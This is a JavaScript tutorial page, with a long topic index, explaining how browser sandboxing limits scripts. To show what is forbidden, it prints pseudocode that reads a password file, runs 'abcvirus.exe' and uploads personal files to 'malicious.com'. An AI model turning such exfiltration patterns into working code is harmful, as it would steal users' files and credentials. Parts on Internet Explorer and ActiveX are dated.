JavaScript

1. Java Script Module 2. World Wide Web (WWW) 3. Web Terms 4. NEED FOR SCRIPT 5. Introduction to Internet Programming 6. CLIENT SIDE and SERVER SIDE Scripting 7. Different Scripting Languages 8. Introduction to JavaScript 9. JavaScript and Security 10. How to Enable JavaScript 11. Advantages of Java Script 12. Limitations with JavaScript 13. Difference between JavaScript and JAVA 14. Difference between JavaScript and VBScript 15. JavaScript Development Tools 16. JavaScript Programming Techniques 17. JavaScript terms 18. Starting with JavaScript Programming step by step 19. Time to start JavaScript Programming 20. JavaScript Variables 21. JavaScript RESERVED WORDS 22. JavaScript Data Type 23. NUMBER DATA TYPE 24. BOOLEAN DATA TYPE 25. STRING DATA TYPE 26. NULL DATA TYPE 27. JavaScript Undefined DATA TYPE 28. JavaScript Operators 29. JavaScript Arithmetic Operators 30. JavaScript Logical Operators 31. JavaScript Comparison Operators 32. JavaScript String Operators 33. Bit Manipulation Operators 34. JavaScript Assignment Operators 35. JavaScript Conditional Operator 36. Conversion between JavaScript Data Types 37. Alert JavaScript function 38. confirm JavaScript function 39. prompt JavaScript function 40. JavaScript Statements 41. Single line & Multi-line Comments 42. JavaScrip If Statement 43. JavaScript if..else Statements 44. JavaScript If…else..if statement. 45. JavaScript For Statement 46. JavaScript For..in Statement: 47. JavaScript While Statement 48. JavaScript do while Statement: 49. JavaScript break and continue statement 50. JavaScript switch Statement: 51. JavaScript function() 52. JavaScript function with a Return Value 53. JavaScript with Statement 54. try, catch, and throw Statements 55. JavaScript ARRAY 56. JavaScript array of different data types 57. JavaScript ARRAY and Bubble sorting Program 58. JavaScript Array Methods 59. concate() method 60. every() method 61. filter() method 62. forEach() method 63. indexOf() method 64. Join() method 65. lastIndexOf() method 66. map() method 67. reduce() method 68. reduceRight() method 69. reverse() method 70. some() method 71. toSource() method 72. toString() method 73. pop() method 74. push() method 75. shift () method 76. slice () method 77. splice () method 78. sort() method 79. unshift() method 80. EVENT handling with JavaScript 81. onblur JavaScript Event 82. onchange JavaScript Event 83. onclick JavaScript Event 84. onDblClick JavaScript Event 85. onfocus JavaScript Event 86. onkeydown JavaScript Event 87. onkeyup JavaScript Event 88. Onkeypress JavaScript Event 89. onLoad JavaScript Event 90. onMousedown JavaScript Event 91. onMouseup JavaScript Event 92. Onmouseover JavaScript Event 93. onmouseout JavaScript Event 94. onMouseMove JavaScript Event 95. onReset JavaScript Event 96. onsubmit JavaScript Event 97. onUnload JavaScript Event 98. The Screen Object 99. JavaScript Interview Part1 100. JavaScript Interview Part2 101. JavaScript Interview Part3 102. JavaScript Interview Part4 103. JavaScript Interview Part5 104. JavaScript Interview Part6 105. JavaScript Interview Part7 106. JavaScript Interview Part8 107. JavaScript Interview Part9 108. JavaScript Interview Part10
Pr.Pg Next Pg

JavaScript and Security tutorials

  • Client–side JavaScript has expressly been developed for use in a web browser in conjunction with HTML pages. This has certain consequences for security.

  • First of all, please note carefully what happens when a user visits a JavaScript–enhanced web site: The user asks for a certain HTML page without knowing whether it contains JavaScript. The HTML page is delivered to the browser, including the scripts. The scripts usually run automatically when the page loads or when the user takes a certain action. In general the user can’t do anything to stop the scripts (well, he could turn off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript exists).

  • So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.

  • JavaScript cannot read files from or write them to the file system on the computer. This would be a clear security hazard

filesystem.read('/my document/password/file');

filesystem.write('abcvirus.exe');

  • JavaScript cannot execute any other programs. This would also be unacceptable something like

execute('abcvirus.exe');

  • JavaScript cannot establish any connection to whatever computer, except to download a new HTML page or to send mail. This, too, would create unacceptable hazards:

var security_hazard = connection.open('malicious.com');

security_hazard.upload(filesystem.read('/my document/password/file'));

security_hazard.upload(filesystem.read('/my document/bank loans.xls'));

  • Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen fit to add some filesystem commands nonetheless, in combination with Interneet Explore and ActiveX technology. This means that Explorer on Windows is structurally less safe than any other browser. Thought latest windows provide in-private browsing and some built–in protection, but hackers regularly find some weaknesses.

  • So JavaScript only works on things that are in HTML pages or part of the browser. You cannot influence anything that's not contained by the browser. But even within the browser there are some no–go areas. Basically JavaScript wants to protect the privacy of the user by disallowing some actions and asking permission for others:

  • You cannot read out the history of the browser. Thus a malicious site owner cannot write a script that finds out where you surfed to recently.

  • You can go back or forward in the browsing history, but you cannot find out which page you’ll go to.

  • You cannot do anything in pages that come from another server. So if your frameset contains two pages from two servers, they cannot communicate with each other. Thus a malicious site owner cannot find out which sites you’ve opened in other browser windows. See the frame busting page for some more information.

You cannot set the value of a file upload field (<input type="file">).

document.forms[0].upload_field.value = '/my/password/file';

document.forms[0].submit();

  • If you try to close a browser window that has not been opened by JavaScript, the user is asked to confirm this action. However, this rule isn't implemented in all browsers and is easy to work around in Explorer.

  • If you try to submit a form to a mail address by JavaScript, the user is asked to confirm this action.

  • You should not be able to open a new window smaller than 100x100 pixels and/or to position it outside the screen area of the computer. Thus a malicious site owner cannot spawn an invisible window. Note that Internet Explorer and maybe other browsers, too does allow this, contrary to safety regulations.

 

Pr.Pg border                                              Next Pg